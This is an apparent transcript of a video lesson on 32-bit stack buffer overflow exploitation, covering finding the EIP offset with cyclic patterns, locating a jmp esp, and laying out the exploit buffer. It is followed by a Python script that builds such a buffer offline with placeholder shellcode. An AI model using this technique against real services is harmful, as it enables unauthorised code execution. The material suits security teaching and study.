1 00:00:01,110 --> 00:00:01,550 All right.
2 00:00:01,560 --> 00:00:07,710 Welcome back to part three of our reboot for Introduction to Exploit Development Within Containers.
3 00:00:08,520 --> 00:00:15,450 So at this point, we want to perform a jmpcall command to find a way to land into the extended stack
4 00:00:15,450 --> 00:00:18,690 pointer, because look at our original exploit code right now.
5 00:00:18,690 --> 00:00:28,050 So we know that the extended stack pointer can hold our buffer of C's, and we call it shellcode space.
6 00:00:28,410 --> 00:00:38,760 So let's use the command jmpcall and look specifically for calls that specifically say jmp to the
7 00:00:38,760 --> 00:00:42,090 extended stack pointer, because we know it's at least 200 bytes.
8 00:00:42,480 --> 00:00:44,880 I have tried this with the latest version of Metasploit.
9 00:00:44,880 --> 00:00:48,570 So 200 bytes is more than enough to fit shellcode.
10 00:00:49,170 --> 00:00:55,620 You can pick any of these instructions right here or here or here, as long as it lands at the ESP,
11 00:00:55,650 --> 00:01:02,460 because in our previous video we dumped the extended stack pointer at its location, we dumped 200 bytes,
12 00:01:02,790 --> 00:01:06,990 and we found out it's more than adequate space to fit our shellcode.
13 00:01:07,650 --> 00:01:12,510 So let's make a note in our exploit. Control C.
14 00:01:14,850 --> 00:01:16,200 Go back to our editor
15 00:01:20,610 --> 00:01:22,830 and then we're going to comment this out.
16 00:01:25,960 --> 00:01:28,720 And we're actually going to comment out EIP.
17 00:01:29,170 --> 00:01:31,570 So there's actually two ways that you can do this.
18 00:01:31,600 --> 00:01:39,910 Normally what you would have done in the previous version of my course is EIP equals bytes, and then
19 00:01:39,910 --> 00:01:42,610 you reverse each byte, including the first one.
20 00:01:43,120 --> 00:01:48,130 So it will be \x6f
21 00:01:48,130 --> 00:01:53,860 \xc6\x04\x08.
22 00:01:54,010 --> 00:01:56,320 However, we don't need to do that anymore.
23 00:01:56,350 --> 00:02:01,960 In fact, I'm going to show you a different way, because Offensive Security, you learn security.
24 00:02:01,960 --> 00:02:07,000 And a lot of these people that are on these write-ups opt for 32-bit exploitation.
25 00:02:07,090 --> 00:02:09,280 They keep on talking about reversing the bytes.
26 00:02:09,280 --> 00:02:14,260 But what they're really trying to get to you is that they're trying to tell you about endianness.
27 00:02:15,130 --> 00:02:22,450 But what we can do now, especially once you get to the ROP chain section, this would be very convenient.
28 00:02:23,710 --> 00:02:24,370 What's this?
29 00:02:25,480 --> 00:02:38,080 It must have hit some dumb command. EIP equals struct.pack, single quote, less-than symbol, capital L, and
30 00:02:38,080 --> 00:02:41,470 then copy the memory address right here.
31 00:02:42,580 --> 00:02:45,670 So this does the exact same thing as this.
32 00:02:47,320 --> 00:02:52,240 And what it does is that it actually packs it as little endian.
33 00:02:52,600 --> 00:02:55,610 So this less-than sign I'm highlighting right here.
34 00:02:55,630 --> 00:02:56,710 Let me see if I can zoom in.
35 00:02:57,550 --> 00:03:07,780 This less-than sign right here is to pack it as little endian, and capital L stands for long integer, which
36 00:03:07,780 --> 00:03:10,720 means a four-byte memory address, basically.
37 00:03:13,570 --> 00:03:16,030 So let's run our exploit again.
38 00:03:17,080 --> 00:03:18,370 Let me just zoom out.
39 00:03:22,000 --> 00:03:22,390 Control
40 00:03:22,390 --> 00:03:32,290 C. Go back to our exploit, so Control B Z to exit zoom, nano exploit.py, and then we want to clear
41 00:03:32,290 --> 00:03:33,430 all of this out.
42 00:03:34,990 --> 00:03:38,440 Then we want to Control Shift C to copy all of this in.
43 00:03:40,600 --> 00:03:48,370 So what I expect to happen is that it's going to take the jmp esp call, it's going to crash where
44 00:03:48,370 --> 00:03:51,580 the C's are at because it doesn't know what it means.
45 00:03:54,020 --> 00:03:56,140 And then we're going to run our payload.
46 00:03:57,680 --> 00:03:59,950 We just need to make sure that our payload works.
47 00:03:59,980 --> 00:04:01,270 Let me just exit this.
48 00:04:02,060 --> 00:04:04,440 run -p 80
49 00:04:04,520 --> 00:04:07,230 80.
50 00:04:07,250 --> 00:04:09,620 exploit.py. Control
51 00:04:09,640 --> 00:04:10,190 C.
52 00:04:15,380 --> 00:04:21,570 As you can see, we have been redirected to the extended stack pointer where the C's are at.
53 00:04:21,579 --> 00:04:28,540 So it did take the jump to the extended stack pointer, and this is where we get to have our shellcode
54 00:04:28,540 --> 00:04:29,290 placed in.
55 00:04:30,040 --> 00:04:34,330 So wait till our next moment where we will generate our exploit code.
56 00:04:34,960 --> 00:04:40,780 So I'm actually kind of a busy man, but you can actually go into reversing bad bytes or finding the
57 00:04:40,780 --> 00:04:45,280 bad bytes in our previous 2019 edition of our class.
58 00:04:45,970 --> 00:04:53,500 But tomorrow in our next section, we're going to go over how to generate the proper shellcode.
59 00:04:59,260 --> 00:04:59,500 All right.
60 00:04:59,500 --> 00:05:01,840 I just made a little bit of an error.
61 00:05:02,200 --> 00:05:03,730 I actually missed one line.
62 00:05:04,030 --> 00:05:07,850 So what I want you to do is copy and paste the code right here.
63 00:05:07,870 --> 00:05:11,290 I forgot to actually write it into the file, as you can see.
64 00:05:11,290 --> 00:05:12,520 So I missed one line.
65 00:05:13,360 --> 00:05:19,090 But going back to our original development methodology, we're going to crash the program.
66 00:05:19,510 --> 00:05:22,900 So run -p 8080.
67 00:05:24,010 --> 00:05:32,650 Make sure that your exploit has the new code right here, which is w, write the buffer.
68 00:05:34,830 --> 00:05:36,240 python3 exploit
69 00:05:36,450 --> 00:05:36,970 .py.
70 00:05:37,740 --> 00:05:41,550 Now to finish the request, we must Control C out of it.
71 00:05:43,200 --> 00:05:44,550 And we see a crash.
72 00:05:45,930 --> 00:05:46,950 We notice,
73 00:05:46,950 --> 00:05:53,700 if you do this, if you go press Control B Up, you'll go up to the upper pane.
74 00:05:54,000 --> 00:06:02,220 So now press Control B Z to zoom in, and we notice that EIP is overwritten by four A's.
75 00:06:02,220 --> 00:06:11,850 So previously in our older 2019 version of the class, I said that we're going to use msf-pattern_
76 00:06:11,850 --> 00:06:12,450 create.
77 00:06:12,450 --> 00:06:20,400 You can use either or, but we can also use the pattern create feature within GNU Debugger PEDA, so
78 00:06:20,400 --> 00:06:25,260 we can do this: pattern create 1400.
79 00:06:27,840 --> 00:06:37,110 So make sure you copy only what's within the single quotes, and then we're going to update our exploit
80 00:06:37,110 --> 00:06:37,620 again.
81 00:06:39,480 --> 00:06:45,330 So we're going to change this code, that of buffer.
82 00:06:45,690 --> 00:06:51,610 Sorry, I got a text. buffer equals b, remember, don't forget about your b, all right.
83 00:06:51,630 --> 00:06:58,620 This specifies bytes in Python 3, and then we copy and paste our cyclic pattern.
84 00:06:59,070 --> 00:07:08,820 Remember, this is called a cyclic pattern, and cyclic patterns map out sections of the buffer.
85 00:07:11,090 --> 00:07:16,550 So we're going to copy our new exploit into our Docker container.
86 00:07:23,590 --> 00:07:28,900 nano exploit.py, delete everything,
87 00:07:33,870 --> 00:07:34,950 and then save it again.
88 00:07:35,880 --> 00:07:38,550 run -p 80
89 00:07:38,550 --> 00:07:39,150 80.
90 00:07:43,220 --> 00:07:45,620 python3 exploit.py.
91 00:07:47,840 --> 00:07:49,340 And then Control C out of it.
92 00:07:50,720 --> 00:07:52,220 And we're going to find this.
93 00:07:52,220 --> 00:08:00,530 So go back up to the top pane, Control B Z to zoom in, and we find out that EIP is overwritten by the strange
94 00:08:00,530 --> 00:08:01,190 string.
95 00:08:01,760 --> 00:08:05,810 So we can actually use the debugging extensions
96 00:08:05,810 --> 00:08:09,410 within GNU Debugger PEDA to search for our offset.
97 00:08:09,980 --> 00:08:12,110 So pattern search.
98 00:08:13,580 --> 00:08:14,810 Copy and paste this.
99 00:08:17,540 --> 00:08:25,370 It's quite informative, but what it's saying is that our base pointer is overwritten at 1044 bytes.
100 00:08:25,730 --> 00:08:29,540 Our instruction pointer is overwritten at 1048 bytes.
101 00:08:29,570 --> 00:08:30,070 I'm sorry.
102 00:08:30,080 --> 00:08:36,200 My father is just, like, running some sort of stupid, like, woodworking kind of thing, so he probably
103 00:08:36,440 --> 00:08:37,250 couldn't hear it.
104 00:08:37,280 --> 00:08:38,360 I hope you don't hear it.
105 00:08:38,360 --> 00:08:45,800 And our extended stack pointer is overwritten starting at 1052 bytes.
106 00:08:47,480 --> 00:08:50,930 So we need to now verify that this actually works.
107 00:08:50,930 --> 00:08:51,500 Right.
108 00:08:52,100 --> 00:08:59,840 So we need to now change our exploit again to make sure that we can correctly overwrite EIP reliably,
109 00:08:59,840 --> 00:09:01,760 which is the extended instruction pointer.
110 00:09:03,080 --> 00:09:04,610 So let's comment this out
111 00:09:08,000 --> 00:09:23,840 and let's make a new variable called overflow equals b'A' times 1048, and then we'll have another one called
112 00:09:23,870 --> 00:09:29,780 eip equals b'B' times four.
113 00:09:32,030 --> 00:09:34,280 And then we're going to write another variable.
114 00:09:35,450 --> 00:09:47,210 Let's just call it shellcode_space equals b'C', times, or Python C,
115 00:09:50,580 --> 00:09:51,570 times
116 00:09:54,480 --> 00:09:55,470 1048
117 00:09:55,620 --> 00:09:57,000 minus four.
118 00:09:57,630 --> 00:09:59,590 So 1400
119 00:09:59,850 --> 00:10:01,200 minus 10
120 00:10:01,200 --> 00:10:01,980 48
121 00:10:01,980 --> 00:10:02,940 minus four.
122 00:10:04,110 --> 00:10:15,120 So now our buffer is going to be buffer equals overflow plus eip plus shellcode_space.
123 00:10:18,080 --> 00:10:21,200 So let's copy and paste this into our container.
124 00:10:26,680 --> 00:10:26,980 Control
125 00:10:26,980 --> 00:10:28,480 B Z to stop the zoom.
126 00:10:29,290 --> 00:10:31,270 nano exploit.py.
127 00:10:41,330 --> 00:10:53,540 Restart the debugger, -p 8080, python3 exploit.py, Control C to stop, and Control B Z to zoom back
128 00:10:53,540 --> 00:11:03,770 in, and notice that we actually correctly found our exact buffer overwrite, and it's then in the stack pointer.
129 00:11:03,800 --> 00:11:11,330 So if you do something like x/100x $esp.
130 00:11:13,650 --> 00:11:15,030 Hex 43
131 00:11:15,060 --> 00:11:20,040 is actually the hex for capital C.
132 00:11:22,530 --> 00:11:29,460 We can actually calculate how much time, or how many C's, that we have, but we already printed 100 bytes,
133 00:11:29,790 --> 00:11:32,670 so we can do 200.
134 00:11:34,140 --> 00:11:38,730 We have more than enough bytes to put in a basic reverse command shell.
135 00:11:39,930 --> 00:11:43,470 So this covers the end of our EIP overwrite.
136 00:11:45,600 --> 00:11:52,170 In our later video, we will find a jmp call towards ESP, because this is where we're going to put in
137 00:11:52,170 --> 00:11:54,210 our NOP sled and shellcode.
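The following is an added worked example that is not part of the video or the instructor's exploit.py. It reproduces, offline, the pieces of the workflow the transcript walks through: the two ways of writing a little-endian return address (reversing the bytes by hand versus struct.pack('<L', ...)), a Metasploit/PEDA-style cyclic pattern and the offset search the instructor does with pattern search, the bad-byte check he refers viewers to the 2019 class for, and the final overflow + eip + shellcode_space layout with the NOP sled in front of the shellcode. The return address 0x0804c66f is the value implied by the bytes \x6f\xc6\x04\x08 the instructor types; the offset 1048 and total length 1400 are the numbers stated in the transcript; the shellcode is a constructed int3 placeholder standing in for msfvenom output, and the bad-byte list is an assumption, not something the page states.

```python
import itertools
import string
import struct

# Values taken from the transcript: pattern length 1400, EIP overwritten at 1048,
# return address 0x0804c66f (what \x6f\xc6\x04\x08 decodes to). Assumed, not from the
# page: the bad-byte list below and the int3 placeholder shellcode.
PATTERN_LEN = 1400
EIP_OFFSET = 1048
JMP_ESP = 0x0804C66F
BAD_BYTES = b"\x00\x0a\x0d"          # assumption: typical list for a text-based service
PLACEHOLDER_SHELLCODE = b"\xcc" * 4  # constructed stand-in for msfvenom output


def pack_addr_manual(addr: int) -> bytes:
    """The 'reverse every byte' method from the older course: big-endian hex,
    then flip the byte order by hand."""
    return bytes.fromhex(f"{addr:08x}")[::-1]


def pack_addr(addr: int) -> bytes:
    """The struct.pack method: '<' = little endian, 'L' = 4-byte unsigned long."""
    return struct.pack("<L", addr)


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern Aa0Aa1Aa2... (what msf-pattern_create and
    PEDA's 'pattern create' emit). Every 4-byte window is unique within the first
    26*26*10*3 = 20280 bytes, which is why the crash value maps to one offset."""
    out = bytearray()
    for upper, lower, digit in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    ):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            return bytes(out[:length])
    raise ValueError("length exceeds the pattern period")


def pattern_offset(pattern: bytes, value) -> int:
    """Equivalent of PEDA's 'pattern search': 'value' is either the 4 raw bytes
    or the register value as gdb prints it (an int, already little-endian
    decoded). Returns -1 when the value is not in the pattern."""
    needle = pack_addr(value) if isinstance(value, int) else value
    return pattern.find(needle)


def has_bad_bytes(payload: bytes, bad: bytes = BAD_BYTES) -> bool:
    """True if any byte the target would mangle appears in the payload."""
    return any(b in payload for b in bad)


def build_buffer(offset: int, ret_addr: int, shellcode: bytes,
                 total_len: int = PATTERN_LEN, nop: bytes = b"\x90") -> bytes:
    """overflow + eip + shellcode_space, as in the transcript, with the space
    after EIP (where ESP lands) filled by a NOP sled followed by the shellcode."""
    overflow = b"A" * offset
    eip = pack_addr(ret_addr)
    space = total_len - offset - len(eip)
    if len(shellcode) > space:
        raise ValueError(f"shellcode ({len(shellcode)}) exceeds space ({space})")
    shellcode_space = nop * (space - len(shellcode)) + shellcode
    buf = overflow + eip + shellcode_space
    if has_bad_bytes(eip):
        raise ValueError("return address contains a bad byte; pick another jmp esp")
    return buf


if __name__ == "__main__":
    pat = pattern_create(PATTERN_LEN)
    # Simulate the crash: EIP holds whatever 4 pattern bytes sat at offset 1048.
    crashed_eip = struct.unpack("<L", pat[EIP_OFFSET:EIP_OFFSET + 4])[0]
    print(f"EIP after crash: 0x{crashed_eip:08x} -> offset {pattern_offset(pat, crashed_eip)}")
    print("manual:", pack_addr_manual(JMP_ESP), "struct:", pack_addr(JMP_ESP))
    buf = build_buffer(EIP_OFFSET, JMP_ESP, PLACEHOLDER_SHELLCODE)
    print(f"buffer length {len(buf)}, bytes at ESP: {buf[EIP_OFFSET + 4:EIP_OFFSET + 12]!r}")
```

Running it shows the crash value 0x6a423969 resolving to offset 1048, both packing methods producing the same four bytes, and a 1400-byte buffer whose ESP region begins with the NOP sled. The bad-byte check on the return address is the step worth keeping in a real exploit.py: a jmp esp whose address contains 0x00 or 0x0a will be truncated by the service before it ever reaches EIP, and the symptom looks exactly like a wrong offset.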